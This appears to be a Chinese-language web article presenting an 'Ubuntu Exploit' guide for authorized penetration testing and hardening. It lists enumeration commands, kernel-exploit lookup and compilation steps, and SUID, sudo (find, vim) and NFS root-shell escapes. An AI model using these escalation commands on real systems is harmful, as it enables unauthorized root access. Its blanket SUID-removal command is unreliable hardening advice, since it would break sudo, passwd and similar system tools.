Ubuntu Exploit:用户指南
导读:Ubuntu Exploit 用户指南 合规测试与加固 一 合规与范围 本指南仅用于对你拥有或已获得书面授权的系统进行安全测试,禁止用于未授权环境或任何非法目的。 测试流程建议遵循:信息收集 → 漏洞探测 → 提权尝试 → 安全加固,每一...
Ubuntu Exploit 用户指南 合规测试与加固
一 合规与范围
- 本指南仅用于对你拥有或已获得书面授权的系统进行安全测试,禁止用于未授权环境或任何非法目的。
- 测试流程建议遵循:信息收集 → 漏洞探测 → 提权尝试 → 安全加固,每一步都需记录证据与影响评估,并在测试完成后完成修复与复测。
- 注意:内核/提权类操作可能导致系统不稳定或崩溃,务必在隔离环境、快照回滚点或维护窗口内执行,并提前做好完整备份。
二 信息收集与枚举
- 系统与内核识别
- 查看发行版与内核:
cat /etc/os-release、lsb_release -a、uname -a、cat /proc/version - 识别架构与主机信息:
uname -m、hostname
- 查看发行版与内核:
- 用户与权限
- 当前权限与所属组:
id、whoami - 可提权命令:
sudo -l - 登录与历史:
w、last、lastlog、cat /etc/passwd | grep -v nologin
- 当前权限与所属组:
- 网络与监听
- 端口与服务:
netstat -lntp、ss -lntp
- 端口与服务:
- 进程、服务与软件
- 进程与服务:
ps aux、top、cat /etc/services - 已安装包:
dpkg -l
- 进程与服务:
- 计划任务与敏感文件
- 任务与脚本:
crontab -l、cat /etc/crontab、ls -al /etc/cron* - 历史与环境:
history、env、echo $PATH
- 任务与脚本:
- 远程服务探测(在授权范围内)
- 全端口与服务/漏洞脚本:
nmap -p- -sV --script vuln < 目标IP>。
- 全端口与服务/漏洞脚本:
三 常见提权路径与简要复现
- 内核漏洞提权
- 思路:确认内核/发行版 → 检索匹配 EXP → 编译运行 → 验证 root。
- 检索工具:
searchsploit linux < 版本/发行版>;或访问 Exploit-DB 在线检索。 - 示例(仅示例,需匹配版本与条件):
searchsploit linux 3.13.0 ubuntu - 编译与执行:
gcc exploit.c -o exploit & & chmod +x exploit & & ./exploit - 风险提示:内核利用存在崩溃风险,优先在非生产环境验证。
- SUID 提权
- 查找 SUID 文件:
find / -perm -u+s -type f 2> /dev/null - 典型场景:若
find具 SUID,可执行find / -exec /bin/bash -p \;获取 root shell(仅在存在该配置时成立)。
- 查找 SUID 文件:
- sudo 权限滥用
- 检查:
sudo -l - 典型命令:
sudo find / -name test -exec /bin/sh \;、sudo vim -c ':!sh'(旧版nmap --interactive亦可被滥用)。
- 检查:
- 计划任务与服务配置
- 检查:
crontab -l、cat /etc/crontab、systemctl list-timers - 风险点:可写脚本、错误路径/权限、以 root 运行的自定义脚本。
- 检查:
- NFS 配置不当
- 风险:导出目录含
no_root_squash时,可在挂载点创建 SUID 二进制实现提权。 - 检测与规避:确保默认启用 root_squash,必要时审计
/etc/exports与挂载点权限。
- 风险:导出目录含
- 自动化辅助工具
- 推荐:
LinEnum、linux-exploit-suggester,用于快速枚举与漏洞建议(仅作辅助,仍需人工验证)。
- 推荐:
四 安全加固与修复清单
- 系统与内核
- 及时更新:
sudo apt update & & sudo apt full-upgrade -y & & sudo reboot - 内核防护:启用/保持 ASLR 等机制,减少内核漏洞利用成功率。
- 及时更新:
- SSH 安全
- 禁用 root 登录与密码登录,改用密钥:
PermitRootLogin no、PasswordAuthentication no - 重启服务:
sudo systemctl restart sshd
- 禁用 root 登录与密码登录,改用密钥:
- 权限最小化
- 审计
sudoers:sudo visudo -c,移除不必要的 NOPASSWD 与过宽规则。 - 清理不必要的 SUID:
find / -user root -perm -4000 -ls -exec chmod u-s { } \;
- 审计
- 计划任务与服务
- 严格控制脚本属主与权限,避免可写;对关键文件/目录启用 auditd 监控变更。
- 防火墙与网络
- 仅放行必要端口:
sudo ufw allow 22/tcp & & sudo ufw enable
- 仅放行必要端口:
- 专项修复示例
- CVE-2017-16995(Ubuntu 16.04.1–16.04.4,内核 4.4–4.14):检查
cat /proc/sys/kernel/unprivileged_bpf_disabled;若为 0,可临时缓解:echo 1 > /proc/sys/kernel/unprivileged_bpf_disabled(重启后失效,需持久化配置)。
- CVE-2017-16995(Ubuntu 16.04.1–16.04.4,内核 4.4–4.14):检查
五 法律与安全声明
- 本内容仅用于合规的安全测试与防护目的。对未授权系统进行测试或利用属于违法行为,可能导致民事与刑事责任。
- 在生产环境执行提权/内核利用前,请确保具备明确授权、回滚方案与应急预案,并对业务影响进行充分评估。
- 安全是一个持续过程,建议结合定期补丁、最小权限、日志审计与入侵检测构建纵深防御体系。
声明:本文内容由网友自发贡献,本站不承担相应法律责任。对本内容有异议或投诉,请联系2913721942#qq.com核实处理,我们将尽快回复您,谢谢合作!
若转载请注明出处: Ubuntu Exploit:用户指南
本文地址: https://pptw.com/jishu/777325.html
